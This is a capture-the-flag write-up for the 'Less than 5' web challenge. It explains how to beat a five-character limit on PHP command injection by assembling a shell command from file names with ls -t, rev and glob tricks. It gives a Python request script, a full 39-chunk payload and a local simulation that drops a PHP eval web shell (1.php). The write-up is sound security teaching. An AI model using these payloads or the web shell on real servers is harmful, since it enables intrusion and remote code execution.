Rating: 5.0

# Web: Less than 5


## Website:


There is a blank white page. Let's test the parameters from the challenge description - `cmd` and `reset`.



We don't get any output from that. Maybe we should look for some **edge cases** to see how the app behaves.


A **null byte** works as usual in PHP scripts. Now we can check how the length check is handled.


Input longer than 5 characters is **not passed to the exec function.**

## Fight with input length:

At first I thought the challenge was about simple command injection.
I tried using `*` and `>` to read the flag or `index.php` but didn't get anything.
A length of 5 was too small to make any progress that way.
The only thing I accomplished was creating files with short names and reading them.
This led me to **executing ls and reading the output.**

That's something. At that moment I knew the challenge was about building a payload from multiple files.
The challenge description also says that files are removed every 2 minutes, so keep that in mind.

## Research:

After feeling a bit helpless I started to google for **short php** payloads. I stumbled upon a few interesting articles.
* [blog.spacepatroldelta.com](https://blog.spacepatroldelta.com/a?ID=01800-96c1d853-a6ab-4a27-b2c5-157e586418d3)
* [blog.csdn.net/](https://blog.csdn.net/nzjdsds/article/details/102940762)

In the above articles they are basically splitting the command `echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64 -d>1.php` into multiple files (the base64 decodes to `<?php eval($_GET[1]);`).
Then they use `ls -t>0` to list the files sorted by the time they were created and put all of the names into one file - `0`.
When that succeeds they execute `0` with `sh 0` and the outcome is a `1.php` file with the PHP content. But `ls -t>0` alone is already 7 chars, so how did they get around the limit?


**That's pure magic. How does it even work?**

First we need to understand a few commands:
* dir - like `ls`, but it is `ls -C -b`: names are printed in columns, so several of them land on one line
* rev - reverses the input: `echo 1234|rev` -> `4321`

So at first they build a reversed payload. With `*>v` the glob `*` expands to every file name in the directory in sorted order, so the first file alphabetically (`dir`) becomes the command and the remaining names become its arguments; `dir` prints those names on one line and the redirect saves it to `v`.
Next they use `rev` to reverse that line and write it to another file, `0`, which now holds the forward command.
Well, that works. A pretty crazy way to get around the limit.

**I found everything that is needed, right? Copy, paste, run... it didn't work. Unfortunately, it wasn't that simple.**

## Local setup

I created a simple PHP script that simulates the behaviour of the challenge.


After a while I knew what didn't work. When building up `ls -t` from files there is one difference between the articles and the actual challenge: we also have `index.php` in the same directory, which breaks the whole payload.


`index.php` landed between the payload files and the whole thing was messed up. I had to find a reversed payload that sorts after `index.php` in the glob expansion.


**Found it!** Below is how it works.


# Solution:

A simple Python script which creates all the files needed and calls the `1.php` endpoint to check if it worked.

```python
import requests
from urllib.parse import quote

# Challenge URL with the cmd parameter; the host was left out here,
# the shape is e.g. "http://<host>/?cmd={0}"
url = "{0}"

# payload.txt holds one chunk (at most 5 characters) per line; each line is
# sent as a separate request, in file order, so the files get created in
# the order ls -t needs
with open("payload.txt", "r") as f:
    for i in f:
        chunk = i.strip()
        # percent-encode the chunk: characters such as '#', '&' or '\\'
        # would otherwise be eaten by the URL parser
        target = url.format(quote(chunk, safe=""))
        print("[*]" + target)
        requests.get(target)

# 1.php is the file the assembled command writes; a 200 means it worked
# (its URL was left out here as well)
test = requests.get("")
if test.status_code == requests.codes.ok:
    print("[+] 1.php is there")
```

The lines of `payload.txt` that are visible on this page (the full file is in the original writeup):

```
>\ \\
sh 0
sh n
```
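The whole chain, run locally against a stand-in for the challenge, as an added example that is not the writeup's own script or payload. The `run_chunk` function plays the part of the `cmd` endpoint: it rejects anything longer than 5 characters and otherwise hands the input to `sh -c` in a constructed web root that contains an empty `index.php`, as on the page. The chunk names are my own: an empty file named `echo` is used in place of `dir` so that the first word of the glob is a shell builtin (no coreutils `dir` needed), `j#` makes the reversed `index.php` into a shell comment, `pt-` (reversed `-tp`) is chosen because it sorts between `j>` and `sl`, and the second space of the final command comes from `${IFS}` because a file name can only exist once. It assumes `rev`, `ls` and `base64` are present and is pinned to `LC_ALL=C`; a target running under a UTF-8 locale may sort the punctuation in `j#`/`j>` differently.

```shell
#!/bin/sh
# Added example, not code from the writeup. It simulates the challenge's
# cmd parameter (5-character limit in front of PHP exec()) and runs the
# whole chain: build "ls -tp >j" from file names with glob + rev, then
# assemble "echo <b64>|base64 -d>1.php" from names listed by ls -t.
export LC_ALL=C   # byte-wise glob order; the real target's locale may differ

# Stand-in for the vulnerable endpoint: refuse >5 chars, otherwise pass the
# input to sh -c inside the constructed web root, stdin closed like a
# web-server child. Exit status is ignored, as exec() would.
run_chunk() {
    c=$2
    [ "${#c}" -le 5 ] || { printf 'rejected (%d chars): %s\n' "${#c}" "$c" >&2; return 1; }
    printf '[*] %s\n' "$c" >&2
    ( cd "$1" && exec sh -c "$c" ) </dev/null 2>/dev/null || true
    sleep 0.05   # ls -t needs distinct mtimes; kernel timestamps are coarse
}

less5_demo() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/less5.XXXXXX")
    : > "$d/index.php"   # the file that sits in the middle of the glob

    # Phase 1. Names sort byte-wise as: echo index.php j# j> pt- sl.
    # "*>v" runs the echo builtin on the other names, so v holds that line;
    # "*v>x" matches only rev and v, so x holds the reversed line:
    #   ls -tp >j #j php.xedni
    # j# turns the reversed index.php into a comment; pt- gives -tp and
    # sorts between j> and sl (an empty "dir" file instead of "echo" works too).
    while IFS= read -r chunk; do run_chunk "$d" "$chunk"; done <<'EOF'
>echo
>j#
>j\>
>pt-
>sl
*>v
>rev
*v>x
EOF

    # Phase 2. Every piece ends in a backslash, so the ls -t listing joins
    # into one line; ls -t is newest first, so the last piece is created
    # first. " \" supplies the space after echo; the space before -d comes
    # from ${IFS} because " \" can only exist once. Joined result:
    #   echo PD9waHAgZXZhbCgkX0dFVFsxXSk7|base64${IFS}-d>1.php
    while IFS= read -r chunk; do run_chunk "$d" "$chunk"; done <<'EOF'
>php
>1.\\
>\>\\
>d\\
>}-\\
>FS\\
>{I\\
>$\\
>64\\
>se\\
>ba\\
>\|\\
>k7\\
>XS\\
>sx\\
>VF\\
>dF\\
>X0\\
>gk\\
>bC\\
>Zh\\
>ZX\\
>Ag\\
>aH\\
>9w\\
>PD\\
>\ \\
>ho\\
>ec\\
sh x
sh j
EOF
    # "sh x" wrote the listing to j; "sh j" ran the joined line (the
    # leftover phase-1 names after it just error out). Return 1.php's content.
    cat "$d/1.php"
    rm -rf "$d"
}

less5_demo
```

Running it prints the 39 chunks it sends and then `<?php eval($_GET[1]);`, the decoded content of `1.php`. Against the real target each chunk is one HTTP request with the same pacing, and the 2-minute cleanup the challenge mentions is the budget for all of them.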

## FLAG: ictf{5ch4r5_4re_3n0ugh_bd903}

Original writeup (https://github.com/Dom0nS/ctf/blob/main/CTF_writeups/Incognito-ctf-2022/less_than_5.md).